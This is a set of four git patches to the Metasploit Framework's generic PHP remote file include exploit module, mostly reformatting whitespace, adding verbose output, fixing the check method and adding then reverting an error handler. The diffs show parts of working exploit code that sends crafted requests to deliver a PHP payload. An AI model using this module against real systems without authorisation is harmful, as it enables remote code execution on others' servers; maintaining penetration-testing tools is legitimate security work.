From 98b4c653c086e1d1dfea9a29884a7581386ea041 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 17 Aug 2013 17:35:09 +0100
Subject: [PATCH 1/4] php_include - uses verbose

---
 modules/exploits/unix/webapp/php_include.rb | 35 +++++++++++----------
 1 file changed, 19 insertions(+), 16 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
index a03941c399..75528cebeb 100644
--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -16,36 +16,36 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'PHP Remote File Include Generic Code Execution',
-			'Description'    => %q{
+			'Name'		 => 'PHP Remote File Include Generic Code Execution',
+			'Description'   => %q{
 					This module can be used to exploit any generic PHP file include vulnerability,
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
 			},
-			'Author'         => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
-			'License'        => MSF_LICENSE,
-			#'References'     => [ ],
-			'Privileged'     => false,
-			'Payload'        =>
+			'Author'		 => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
+			'License'	   => MSF_LICENSE,
+			#'References'	=> [ ],
+			'Privileged'	 => false,
+			'Payload'	   =>
 				{
 					'DisableNops' => true,
-					'Compat'      =>
+					'Compat'	  =>
 						{
 							'ConnectionType' => 'find',
 						},
 					# Arbitrary big number. The payload gets sent as an HTTP
 					# response body, so really it's unlimited
-					'Space'       => 262144, # 256k
+					'Space'	=> 262144, # 256k
 				},
 			'DefaultOptions' =>
 				{
 					'WfsDelay' => 30
 				},
 			'DisclosureDate' => 'Dec 17 2006',
-			'Platform'       => 'php',
-			'Arch'           => ARCH_PHP,
-			'Targets'        => [[ 'Automatic', { }]],
+			'Platform'	 => 'php',
+			'Arch'		 => ARCH_PHP,
+			'Targets'	   => [[ 'Automatic', { }]],
 			'DefaultTarget' => 0))
 
 		register_options([
@@ -86,6 +86,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def php_exploit
+		# Set verbosity level
+		verbose = datastore['VERBOSE'].to_s.downcase
+
 		uris = []
 
 		tpath = normalize_uri(datastore['PATH'])
@@ -128,21 +131,21 @@ class Metasploit3 < Msf::Exploit::Remote
 		uris.each do |uri|
 			break if session_created?
 
-			# print_status("Sending #{tpath+uri}")
+			print_status("Sending: #{rhost+tpath+uri}") if verbose == "true"
 			begin
 				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
-						'uri'    => tpath+uri,
+						'uri'   => tpath+uri,
 						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
 						{
 							'global'  => true,
-							'uri'     => tpath+uri,
+							'uri'	=> tpath+uri,
 							'method'  => http_method,
-							'data'    => postdata,
+							'data'  => postdata,
 							'headers' => datastore_headers.merge({
 								'Content-Type'   => 'application/x-www-form-urlencoded',
 								'Content-Length' => postdata.length

From 02e394e1c33854119b457536473c4352c3411963 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 17 Aug 2013 17:36:43 +0100
Subject: [PATCH 2/4] php_include - fix check

---
 modules/exploits/unix/webapp/php_include.rb | 52 ++++++++++++---------
 1 file changed, 29 insertions(+), 23 deletions(-)

diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
index 75528cebeb..6aa118e609 100644
--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -2,7 +2,7 @@
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+#	 http://metasploit.com/
 ##
 
 require 'msf/core'
@@ -17,20 +17,20 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'		 => 'PHP Remote File Include Generic Code Execution',
-			'Description'   => %q{
+			'Description'	 => %q{
 					This module can be used to exploit any generic PHP file include vulnerability,
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
 			},
 			'Author'		 => [ 'hdm' , 'egypt', 'ethicalhack3r' ],
-			'License'	   => MSF_LICENSE,
+			'License'		 => MSF_LICENSE,
 			#'References'	=> [ ],
 			'Privileged'	 => false,
-			'Payload'	   =>
+			'Payload'		 =>
 				{
 					'DisableNops' => true,
-					'Compat'	  =>
+					'Compat'		=>
 						{
 							'ConnectionType' => 'find',
 						},
@@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'Dec 17 2006',
 			'Platform'	 => 'php',
 			'Arch'		 => ARCH_PHP,
-			'Targets'	   => [[ 'Automatic', { }]],
+			'Targets'		 => [[ 'Automatic', { }]],
 			'DefaultTarget' => 0))
 
 		register_options([
@@ -59,19 +59,25 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
-	def check
-		uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
-		if(uri and ! uri.empty?)
-			uri.gsub!(/\?.*/, "")
-			print_status("Checking uri #{uri}")
-			response = send_request_raw({ 'uri' => uri})
-			return Exploit::CheckCode::Detected if response.code == 200
-			print_error("Server responded with #{response.code}")
-			return Exploit::CheckCode::Safe
-		else
-			return Exploit::CheckCode::Unknown
+		def check
+				uri = datastore['PHPURI'] ? datastore['PHPURI'].dup : ""
+
+				tpath = normalize_uri(datastore['PATH'])
+				if tpath[-1,1] == '/'
+						tpath = tpath.chop
+				end
+
+				if(uri and ! uri.empty?)
+						uri.gsub!(/\?.*/, "")
+						print_status("Checking uri #{rhost+tpath+uri}")
+						response = send_request_raw({ 'uri' => tpath+uri})
+						return Exploit::CheckCode::Detected if response.code == 200
+						print_error("Server responded with #{response.code}")
+						return Exploit::CheckCode::Safe
+				else
+						return Exploit::CheckCode::Unknown
+				end
 		end
-	end
 
 	def datastore_headers
 		headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
@@ -136,18 +142,18 @@ class Metasploit3 < Msf::Exploit::Remote
 				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
-						'uri'   => tpath+uri,
+						'uri'	 => tpath+uri,
 						'headers' => datastore_headers,
 					}, timeout)
 				elsif http_method == "POST"
 					response = send_request_raw(
 						{
-							'global'  => true,
+							'global'	=> true,
 							'uri'	=> tpath+uri,
-							'method'  => http_method,
-							'data'  => postdata,
+							'method'	=> http_method,
+							'data'	=> postdata,
 							'headers' => datastore_headers.merge({
-								'Content-Type'   => 'application/x-www-form-urlencoded',
+								'Content-Type'	 => 'application/x-www-form-urlencoded',
 								'Content-Length' => postdata.length
 							})
 						}, timeout)

From 71a3f59c250545c6fb904c90612fd26f5d77d8c2 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Sat, 17 Aug 2013 18:30:39 +0100
Subject: [PATCH 3/4] php_include - added error handler

---
 lib/msf/core/exploit/http/server.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 1435d0282d..927ee4a83c 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -501,7 +501,11 @@ module Exploit::Remote::HttpServer
 		# Guard against removing resources added by other modules
 		if @my_resources.include?(name)
 			@my_resources.delete(name)
-			service.remove_resource(name)
+			begin
+				service.remove_resource(name)
+			rescue ::Exception => e
+				print_error("Exception: #{e.class} #{e}")
+			end
 		end
 	end
 

From 7efe85dbd6a57ea6ee6e6225acf9e374215bafa4 Mon Sep 17 00:00:00 2001
From: g0tmi1k <have.you.g0tmi1k@gmail.com>
Date: Tue, 27 Aug 2013 14:00:13 +0100
Subject: [PATCH 4/4] php_include - added @wchen-r7's code improvements

---
 lib/msf/core/exploit/http/server.rb         | 6 +-----
 modules/exploits/unix/webapp/php_include.rb | 5 +----
 2 files changed, 2 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index 927ee4a83c..1435d0282d 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -501,11 +501,7 @@ module Exploit::Remote::HttpServer
 		# Guard against removing resources added by other modules
 		if @my_resources.include?(name)
 			@my_resources.delete(name)
-			begin
-				service.remove_resource(name)
-			rescue ::Exception => e
-				print_error("Exception: #{e.class} #{e}")
-			end
+			service.remove_resource(name)
 		end
 	end
 
diff --git a/modules/exploits/unix/webapp/php_include.rb b/modules/exploits/unix/webapp/php_include.rb
index 6aa118e609..d2c029239e 100644
--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -92,9 +92,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def php_exploit
-		# Set verbosity level
-		verbose = datastore['VERBOSE'].to_s.downcase
-
 		uris = []
 
 		tpath = normalize_uri(datastore['PATH'])
@@ -137,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		uris.each do |uri|
 			break if session_created?
 
-			print_status("Sending: #{rhost+tpath+uri}") if verbose == "true"
+			vprint_status("Sending: #{rhost+tpath+uri}")
 			begin
 				if http_method == "GET"
 					response = send_request_raw( {